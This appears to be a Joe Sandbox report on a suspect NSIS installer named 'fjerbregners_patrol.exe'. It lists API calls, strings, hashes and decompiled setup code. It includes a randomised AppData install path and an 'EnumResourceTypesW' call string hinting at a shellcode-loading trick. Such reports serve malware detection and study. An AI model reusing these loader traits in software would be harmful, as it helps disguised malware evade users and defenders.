                                                                                                                                                                                            0x00403835
                                                                                                                                                                                            0x00403837
                                                                                                                                                                                            0x0040383d
                                                                                                                                                                                            0x00403843
                                                                                                                                                                                            0x00403843
                                                                                                                                                                                            0x0040383d
                                                                                                                                                                                            0x00403853
                                                                                                                                                                                            0x00403855
                                                                                                                                                                                            0x0040385b
                                                                                                                                                                                            0x00403861
                                                                                                                                                                                            0x00403861
                                                                                                                                                                                            0x0040385b
                                                                                                                                                                                            0x0040386b
                                                                                                                                                                                            0x00403889
                                                                                                                                                                                            0x0040388d
                                                                                                                                                                                            0x00403896
                                                                                                                                                                                            0x0040389b
                                                                                                                                                                                            0x0040389b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040386b
                                                                                                                                                                                            0x0040382f
                                                                                                                                                                                            0x0040380b
                                                                                                                                                                                            0x0040380b
                                                                                                                                                                                            0x0040380c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040380c
                                                                                                                                                                                            0x004036a0
                                                                                                                                                                                            0x004036a0
                                                                                                                                                                                            0x004036a4
                                                                                                                                                                                            0x004036ab
                                                                                                                                                                                            0x004036ad
                                                                                                                                                                                            0x004036b7
                                                                                                                                                                                            0x004036b7
                                                                                                                                                                                            0x004036af
                                                                                                                                                                                            0x004036af
                                                                                                                                                                                            0x004036b1
                                                                                                                                                                                            0x004036b1
                                                                                                                                                                                            0x004036b9
                                                                                                                                                                                            0x004036b9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004036b9
                                                                                                                                                                                            0x0040369e
                                                                                                                                                                                            0x0040365c
                                                                                                                                                                                            0x00403665
                                                                                                                                                                                            0x00403667
                                                                                                                                                                                            0x0040366e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403675
                                                                                                                                                                                            0x0040367d
                                                                                                                                                                                            0x0040368d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040367f
                                                                                                                                                                                            0x00403685
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403685

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403629
                                                                                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403652
                                                                                                                                                                                            • GetVersionExA.KERNEL32(?), ref: 00403665
                                                                                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373D
                                                                                                                                                                                            • #17.COMCTL32(00000008,0000000A,0000000C), ref: 00403777
                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040377E
                                                                                                                                                                                            • SHGetFileInfoA.SHELL32(00408462,00000000,?,00000160,00000000), ref: 0040379D
                                                                                                                                                                                            • GetCommandLineA.KERNEL32(Apteres Setup,NSIS Error), ref: 004037B2
                                                                                                                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\fjerbregners_patrol.exe",00000000,"C:\Users\user\Desktop\fjerbregners_patrol.exe",00000000), ref: 004037F1
                                                                                                                                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004038AF
                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004038C4
                                                                                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004038D4
                                                                                                                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004038EC
                                                                                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004038F9
                                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040390A
                                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403916
                                                                                                                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 0040392A
                                                                                                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\fjerbregners_patrol.exe",00000000,00000000), ref: 004039BB
                                                                                                                                                                                              • Part of subcall function 0040690A: lstrcpynA.KERNEL32(?,?,00000400,004037B2,Apteres Setup,NSIS Error), ref: 00406917
                                                                                                                                                                                            • wsprintfA.USER32 ref: 004039FE
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(916,C:\Users\user\AppData\Local\Temp\), ref: 00403A3D
                                                                                                                                                                                            • DeleteFileA.KERNEL32(916), ref: 00403A53
                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A86
                                                                                                                                                                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\fjerbregners_patrol.exe,916,?), ref: 00403AA4
                                                                                                                                                                                            • OleUninitialize.OLE32(00000000), ref: 00403AFB
                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B12
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,1918990196,1918990196,?,916,00000000), ref: 00403B29
                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B49
                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403B50
                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403B66
                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403B8B
                                                                                                                                                                                              • Part of subcall function 004066E5: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403751,0000000C), ref: 004066F3
                                                                                                                                                                                              • Part of subcall function 004066E5: GetProcAddress.KERNEL32(00000000), ref: 0040670F
                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BB2
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$Process$CurrentDeleteDirectoryEnvironmentExitHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AddressAdjustAttributesCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValuelstrcpynwsprintf
                                                                                                                                                                                            • String ID: $ /D=$ _?=$"C:\Users\user\Desktop\fjerbregners_patrol.exe"$1033$1918990196$916$Apteres Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\drvelens\anskrevne$C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly$C:\Users\user\Desktop$C:\Users\user\Desktop\fjerbregners_patrol.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NCRC$NSIS Error$S$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Knu$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu%X.tmp
                                                                                                                                                                                            • API String ID: 2165876562-1008941277
                                                                                                                                                                                            • Opcode ID: 909822a604508d43cea9c3771161edd117fa27f6014c02b7afd697074fe9f0ce
                                                                                                                                                                                            • Instruction ID: 80c71b85b9d31b2044bb6e96c5659dc4fb526394e4f5292e9c828ec836509865
                                                                                                                                                                                            • Opcode Fuzzy Hash: 909822a604508d43cea9c3771161edd117fa27f6014c02b7afd697074fe9f0ce
                                                                                                                                                                                            • Instruction Fuzzy Hash: 47E115703043516AD7206F719D4AB2B3ED8AB4070AF55483FF582B62C2DBBD9905876E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00404A35 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 289windowclipboardmemoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 157 404a35-404a4c 158 404a52-404b20 GetDlgItem * 3 call 4053f2 call 4056ba GetClientRect GetSystemMetrics SendMessageA * 2 157->158 159 404bde-404be4 157->159 183 404b22-404b34 SendMessageA * 2 158->183 184 404b36-404b3c 158->184 161 404be6-404c0c GetDlgItem CreateThread CloseHandle 159->161 162 404c2a-404c30 159->162 166 404c12-404c1b call 4055e0 161->166 163 404c32-404c3c 162->163 164 404c5b-404c61 162->164 163->166 167 404c3e-404c59 ShowWindow * 2 call 4053f2 163->167 168 404c63-404c6a 164->168 169 404ca9-404cac 164->169 177 404c20-404c27 166->177 167->166 174 404c6c-404c76 168->174 175 404c7f-404c94 ShowWindow 168->175 169->166 172 404cb2-404cb6 169->172 172->166 178 404cbc-404cd4 SendMessageA 172->178 180 404c78-404c7d call 4057dd 174->180 181 404ca5-404ca7 175->181 182 404c96-404ca0 call 405ba4 175->182 187 404dd6-404dd8 178->187 188 404cda-404d05 CreatePopupMenu call 405d47 AppendMenuA 178->188 180->166 181->180 182->181 183->184 185 404b48-404b61 call 405409 184->185 186 404b3e-404b46 SendMessageA 184->186 196 404b63-404b77 ShowWindow 185->196 197 404b95-404bbb GetDlgItem SendMessageA 185->197 186->185 187->177 198 404d07-404d17 GetWindowRect 188->198 199 404d1b-404d34 TrackPopupMenu 188->199 200 404b84 196->200 201 404b79-404b82 ShowWindow 196->201 197->187 203 404bc1-404bd9 SendMessageA * 2 197->203 198->199 199->187 202 404d3a-404d4a 199->202 204 404b8a-404b90 call 4053f2 200->204 201->204 205 404d52-404d6c SendMessageA 202->205 203->187 204->197 205->205 207 404d6e-404d95 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 205->207 208 404d97-404dba SendMessageA 207->208 208->208 209 404dbc-404dd0 GlobalUnlock SetClipboardData CloseClipboard 208->209 209->187
                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                            			E00404A35() {
				struct HMENU__* _t56;
				int _t61;
				void* _t68;
				intOrPtr _t78;
				void* _t86;
				intOrPtr _t89;
				long _t103;
				struct HWND__* _t117;
				struct HWND__* _t119;
				struct HWND__* _t120;
				unsigned int _t121;
				int _t126;
				long _t127;
				struct HMENU__* _t128;
				int _t129;
				signed int _t130;
				short* _t131;
				int _t134;
				int _t138;
				long _t139;
				void* _t141;
				long _t142;
				void* _t143;
				long _t144;
				void* _t145;

				_t117 =  *0x4237e8; // 0x203d0
				_t127 =  *(_t145 + 0x64);
				if(_t127 != 0x110) {
					if(_t127 != 0x405) {
						if(_t127 != 0x111) {
							if(_t127 != 0x404) {
								if(_t127 != 0x7b ||  *(_t145 + 0x68) != _t117) {
									L14:
									return E004055E0(_t127,  *(_t145 + 0x6c),  *(_t145 + 0x6c));
								} else {
									_t134 = 0;
									_t138 = SendMessageA(_t117, 0x1004, 0, 0);
									 *(_t145 + 0x68) = _t138;
									if(_t138 <= 0) {
										L37:
										return 0;
									}
									_t56 = CreatePopupMenu();
									_push(0xffffffe1);
									_push(0);
									_t128 = _t56;
									AppendMenuA(_t128, 0, "true", E00405D47());
									_t121 =  *(_t145 + 0x6c);
									_t126 = _t121;
									_t61 = _t121 >> 0x10;
									if(_t121 == 0xffffffff) {
										GetWindowRect(_t117, _t145 + 0x10);
										_t126 =  *(_t145 + 0x10);
										_t61 =  *(_t145 + 0x14);
									}
									if(TrackPopupMenu(_t128, 0x180, _t126, _t61, _t134,  *(_t145 + 0x64), _t134) == 1) {
										_t129 = _t138;
										 *(_t145 + 0x28) = _t134;
										 *(_t145 + 0x34) = 0x41f5e0;
										_t139 = 1;
										 *((intOrPtr*)(_t145 + 0x38)) = 0x1000;
										do {
											_t129 = _t129 - 1;
											_t139 = _t139 + 2 + SendMessageA(_t117, 0x102d, _t129, _t145 + 0x20);
										} while (_t129 != 0);
										OpenClipboard(_t134);
										EmptyClipboard();
										_t141 = GlobalAlloc(0x42, _t139);
										 *(_t145 + 0x64) = _t141;
										_t68 = GlobalLock(_t141);
										_t142 =  *(_t145 + 0x68);
										_t130 = _t68;
										do {
											 *(_t145 + 0x34) = _t130;
											_t131 = _t130 + SendMessageA(_t117, 0x102d, _t134, _t145 + 0x20);
											 *_t131 = 0xa0d;
											_t130 = _t131 + 2;
											_t134 = _t134 + 1;
										} while (_t134 < _t142);
										_t143 =  *(_t145 + 0x60);
										GlobalUnlock(_t143);
										SetClipboardData("true", _t143);
										CloseClipboard();
									}
									goto L37;
								}
							}
							if( *0x4237ec == 0) {
								ShowWindow( *0x4237f8, 8);
								if( *0x4240cc == 0) {
									_t78 =  *0x4205e4; // 0x54e0cc
									_push(0);
									_push( *((intOrPtr*)(_t78 + 0x34)));
									E00405BA4();
								}
								_push("true");
							} else {
								 *0x41f5dc = 2;
								_push(0x78);
							}
							E004057DD();
							goto L14;
						}
						if( *(_t145 + 0x68) == 0x403) {
							ShowWindow( *0x4237e4, 0);
							ShowWindow(_t117, 8);
							E004053F2(_t117);
						}
						goto L14;
					}
					_t86 = CreateThread(0, 0, E004056E9, GetDlgItem( *(_t145 + 0x6c), 0x3ec), 0, _t145 + 0x64); // executed
					CloseHandle(_t86); // executed
					goto L14;
				}
				 *(_t145 + 0x34) =  *(_t145 + 0x34) | 0xffffffff;
				 *(_t145 + 0x20) = 2;
				 *((intOrPtr*)(_t145 + 0x24)) = 0;
				 *((intOrPtr*)(_t145 + 0x2c)) = 0;
				 *((intOrPtr*)(_t145 + 0x30)) = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t89 =  *0x424010;
				_t144 =  *(_t89 + 0x5c);
				 *((intOrPtr*)(_t145 + 0x70)) =  *((intOrPtr*)(_t89 + 0x60));
				 *0x4237e4 = GetDlgItem( *(_t145 + 0x64), 0x403);
				 *0x4237c8 = GetDlgItem( *(_t145 + 0x64), 0x3ee);
				_t119 = GetDlgItem( *(_t145 + 0x64), 0x3f8);
				 *0x4237e8 = _t119;
				E004053F2( *0x4237e4);
				 *0x4237cc = E004056BA(4);
				 *0x4237d0 = 0;
				GetClientRect(_t119, _t145 + 0x10);
				 *(_t145 + 0x28) =  *((intOrPtr*)(_t145 + 0x18)) - GetSystemMetrics(2);
				SendMessageA(_t119, 0x101b, 0, _t145 + 0x20); // executed
				SendMessageA(_t119, 0x1036, 0x4000, 0x4000); // executed
				if(_t144 >= 0) {
					SendMessageA(_t119, 0x1001, 0, _t144);
					SendMessageA(_t119, 0x1026, 0, _t144);
				}
				_t103 =  *(_t145 + 0x68);
				if(_t103 >= 0) {
					SendMessageA(_t119, 0x1024, 0, _t103);
				}
				_push( *((intOrPtr*)( *(_t145 + 0x6c) + 0x30)));
				_push(0x1b);
				E00405409( *(_t145 + 0x68));
				if(( *0x42400c & 0x00000003) != 0) {
					ShowWindow( *0x4237e4, 0);
					if(( *0x42400c & 0x00000002) != 0) {
						 *0x4237e4 = 0;
					} else {
						ShowWindow(_t119, 8);
					}
					E004053F2( *0x4237c8);
				}
				_t120 = GetDlgItem( *(_t145 + 0x64), 0x3ec);
				SendMessageA(_t120, 0x401, 0, 0x75300000);
				if(( *0x42400c & 0x00000004) != 0) {
					SendMessageA(_t120, 0x409, 0,  *(_t145 + 0x68));
					SendMessageA(_t120, 0x2001, 0, _t144);
				}
				goto L37;
			}




























                                                                                                                                                                                            0x00404a39
                                                                                                                                                                                            0x00404a42
                                                                                                                                                                                            0x00404a4c
                                                                                                                                                                                            0x00404be4
                                                                                                                                                                                            0x00404c30
                                                                                                                                                                                            0x00404c61
                                                                                                                                                                                            0x00404cac
                                                                                                                                                                                            0x00404c12
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404cbc
                                                                                                                                                                                            0x00404cbc
                                                                                                                                                                                            0x00404ccc
                                                                                                                                                                                            0x00404cce
                                                                                                                                                                                            0x00404cd4
                                                                                                                                                                                            0x00404dd6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404dd6
                                                                                                                                                                                            0x00404cda
                                                                                                                                                                                            0x00404ce0
                                                                                                                                                                                            0x00404ce2
                                                                                                                                                                                            0x00404ce3
                                                                                                                                                                                            0x00404cef
                                                                                                                                                                                            0x00404cf5
                                                                                                                                                                                            0x00404cfe
                                                                                                                                                                                            0x00404d01
                                                                                                                                                                                            0x00404d05
                                                                                                                                                                                            0x00404d0d
                                                                                                                                                                                            0x00404d13
                                                                                                                                                                                            0x00404d17
                                                                                                                                                                                            0x00404d17
                                                                                                                                                                                            0x00404d34
                                                                                                                                                                                            0x00404d3a
                                                                                                                                                                                            0x00404d3c
                                                                                                                                                                                            0x00404d40
                                                                                                                                                                                            0x00404d48
                                                                                                                                                                                            0x00404d4a
                                                                                                                                                                                            0x00404d52
                                                                                                                                                                                            0x00404d56
                                                                                                                                                                                            0x00404d68
                                                                                                                                                                                            0x00404d6a
                                                                                                                                                                                            0x00404d6f
                                                                                                                                                                                            0x00404d75
                                                                                                                                                                                            0x00404d84
                                                                                                                                                                                            0x00404d87
                                                                                                                                                                                            0x00404d8b
                                                                                                                                                                                            0x00404d91
                                                                                                                                                                                            0x00404d95
                                                                                                                                                                                            0x00404d97
                                                                                                                                                                                            0x00404d9b
                                                                                                                                                                                            0x00404dad
                                                                                                                                                                                            0x00404daf
                                                                                                                                                                                            0x00404db4
                                                                                                                                                                                            0x00404db7
                                                                                                                                                                                            0x00404db8
                                                                                                                                                                                            0x00404dbc
                                                                                                                                                                                            0x00404dc1
                                                                                                                                                                                            0x00404dca
                                                                                                                                                                                            0x00404dd0
                                                                                                                                                                                            0x00404dd0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404d34
                                                                                                                                                                                            0x00404cac
                                                                                                                                                                                            0x00404c6a
                                                                                                                                                                                            0x00404c87
                                                                                                                                                                                            0x00404c94
                                                                                                                                                                                            0x00404c96
                                                                                                                                                                                            0x00404c9b
                                                                                                                                                                                            0x00404c9d
                                                                                                                                                                                            0x00404ca0
                                                                                                                                                                                            0x00404ca0
                                                                                                                                                                                            0x00404ca5
                                                                                                                                                                                            0x00404c6c
                                                                                                                                                                                            0x00404c6c
                                                                                                                                                                                            0x00404c76
                                                                                                                                                                                            0x00404c76
                                                                                                                                                                                            0x00404c78
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404c78
                                                                                                                                                                                            0x00404c3c
                                                                                                                                                                                            0x00404c4c
                                                                                                                                                                                            0x00404c51
                                                                                                                                                                                            0x00404c54
                                                                                                                                                                                            0x00404c54
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404c3c
                                                                                                                                                                                            0x00404c05
                                                                                                                                                                                            0x00404c0c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404c0c
                                                                                                                                                                                            0x00404a52
                                                                                                                                                                                            0x00404a5b
                                                                                                                                                                                            0x00404a6d
                                                                                                                                                                                            0x00404a71
                                                                                                                                                                                            0x00404a75
                                                                                                                                                                                            0x00404a79
                                                                                                                                                                                            0x00404a83
                                                                                                                                                                                            0x00404a84
                                                                                                                                                                                            0x00404a85
                                                                                                                                                                                            0x00404a86
                                                                                                                                                                                            0x00404a87
                                                                                                                                                                                            0x00404a8c
                                                                                                                                                                                            0x00404a92
                                                                                                                                                                                            0x00404aa1
                                                                                                                                                                                            0x00404ab1
                                                                                                                                                                                            0x00404abe
                                                                                                                                                                                            0x00404ac0
                                                                                                                                                                                            0x00404ac6
                                                                                                                                                                                            0x00404ad2
                                                                                                                                                                                            0x00404add
                                                                                                                                                                                            0x00404ae3
                                                                                                                                                                                            0x00404b01
                                                                                                                                                                                            0x00404b0d
                                                                                                                                                                                            0x00404b1c
                                                                                                                                                                                            0x00404b20
                                                                                                                                                                                            0x00404b2a
                                                                                                                                                                                            0x00404b34
                                                                                                                                                                                            0x00404b34
                                                                                                                                                                                            0x00404b36
                                                                                                                                                                                            0x00404b3c
                                                                                                                                                                                            0x00404b46
                                                                                                                                                                                            0x00404b46
                                                                                                                                                                                            0x00404b4c
                                                                                                                                                                                            0x00404b4f
                                                                                                                                                                                            0x00404b55
                                                                                                                                                                                            0x00404b61
                                                                                                                                                                                            0x00404b6a
                                                                                                                                                                                            0x00404b77
                                                                                                                                                                                            0x00404b84
                                                                                                                                                                                            0x00404b79
                                                                                                                                                                                            0x00404b7c
                                                                                                                                                                                            0x00404b7c
                                                                                                                                                                                            0x00404b90
                                                                                                                                                                                            0x00404b90
                                                                                                                                                                                            0x00404baa
                                                                                                                                                                                            0x00404bb2
                                                                                                                                                                                            0x00404bbb
                                                                                                                                                                                            0x00404bcd
                                                                                                                                                                                            0x00404bd7
                                                                                                                                                                                            0x00404bd7
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00404A96
                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00404AA6
                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00404AE3
                                                                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00404AEB
                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000101B,00000000,00000002), ref: 00404B0D
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00001036,00004000,00004000), ref: 00404B1C
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00001001,00000000,?), ref: 00404B2A
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00001026,00000000,?), ref: 00404B34
                                                                                                                                                                                              • Part of subcall function 00405D47: lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405BD7,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,C:\Users\user\Desktop,?,00000000), ref: 00405F22
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00001024,00000000,?), ref: 00404B46
                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404B6A
                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008), ref: 00404B7C
                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00404B9E
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404BB2
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404BCD
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00404BD7
                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404C4C
                                                                                                                                                                                            • ShowWindow.USER32(000203D0,00000008), ref: 00404C51
                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00404AB6
                                                                                                                                                                                              • Part of subcall function 004053F2: SendMessageA.USER32(00000028,?,?,00405229), ref: 00405400
                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00404BF7
                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000056E9,00000000), ref: 00404C05
                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00404C0C
                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 00404C87
                                                                                                                                                                                            • SendMessageA.USER32(000203D0,00001004,00000000,00000000), ref: 00404CC6
                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00404CDA
                                                                                                                                                                                            • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00404CEF
                                                                                                                                                                                            • GetWindowRect.USER32(000203D0,?), ref: 00404D0D
                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00404D29
                                                                                                                                                                                            • SendMessageA.USER32(000203D0,0000102D,-00000001,?), ref: 00404D5F
                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00404D6F
                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 00404D75
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000001), ref: 00404D7E
                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00404D8B
                                                                                                                                                                                            • SendMessageA.USER32(000203D0,0000102D,00000000,?), ref: 00404DA7
                                                                                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 00404DC1
                                                                                                                                                                                            • SetClipboardData.USER32(?,?), ref: 00404DCA
                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00404DD0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • Apteres Setup: Installing, xrefs: 00404D40
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                                                                                                                                                                            • String ID: Apteres Setup: Installing
                                                                                                                                                                                            • API String ID: 2901622961-650456579
                                                                                                                                                                                            • Opcode ID: 318ee8206fb6c3826c8a4d32dea267041fe061fdfb54a9fa3a31af54ea9e5fea
                                                                                                                                                                                            • Instruction ID: 0d7db6b9e3befc248db395c78efa8d0b1ddda984221dff88adf799f15225cb7a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 318ee8206fb6c3826c8a4d32dea267041fe061fdfb54a9fa3a31af54ea9e5fea
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BA1A1B1204304BBD7209F25DD49E5B7EA8FF88755F01483EF781A62E1DB789841CB69
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040154A Relevance: 38.9, APIs: 17, Strings: 5, Instructions: 431stringtimesleepCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
